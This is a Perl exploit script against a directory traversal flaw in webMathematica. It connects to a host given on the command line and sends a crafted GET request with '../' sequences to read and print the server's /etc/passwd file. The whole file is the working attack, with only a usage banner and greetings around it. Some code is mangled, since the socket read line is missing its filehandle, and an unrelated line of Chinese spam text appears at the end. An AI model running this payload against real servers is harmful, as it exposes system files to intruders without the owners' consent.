#!/usr/bin/perl # Author: ntfx # legion2000SR http://legion2000.security.nu # Directory Transversal bug in webMathematica # Shows passwd file or other system files in unix # shows full path disclosure on NT, possible system file exposure. # greet: il, opt1k, kat, spy ### use IO::Socket; use strict; if(! $ARGV[0]) { &usage; exit; } sub usage() { print "USAGE: perl $0 \n"; print "Author: ntfx ntfx\@kernel.net\n"; print "webMathematica Directory Transversal bug\n"; print "Legion2000SR http://legion2000.security.nu\n"; exit(0); } my $host = $ARGV[0]; my $port = $ARGV[1]; my $lin; my @passwd; my $tcpval = getprotobyname('tcp'); my $victim = inet_aton($host); my $serverAddr = sockaddr_in($port, $victim); my $protocol_name = "tcp"; my $sexual = inet_aton($host); my $emotia = sockaddr_in($port, $sexual); my $proto = getprotobyname('tcp'); socket(SOCK, PF_INET, SOCK_STREAM, $proto); connect(SOCK, $emotia); print "\n now getting the passwd file\n\n"; my $submit = "GET /webMathematica/MSP?MSPStoreID=../../../../../etc/passwd&MSPStoreType=text\n\n"; send(SOCK,$submit,0); @passwd=; close (SOCK); foreach $lin(@passwd) { print "$lin"; } print "\npasswd file should now be shown\n\n";

亚洲欧美在线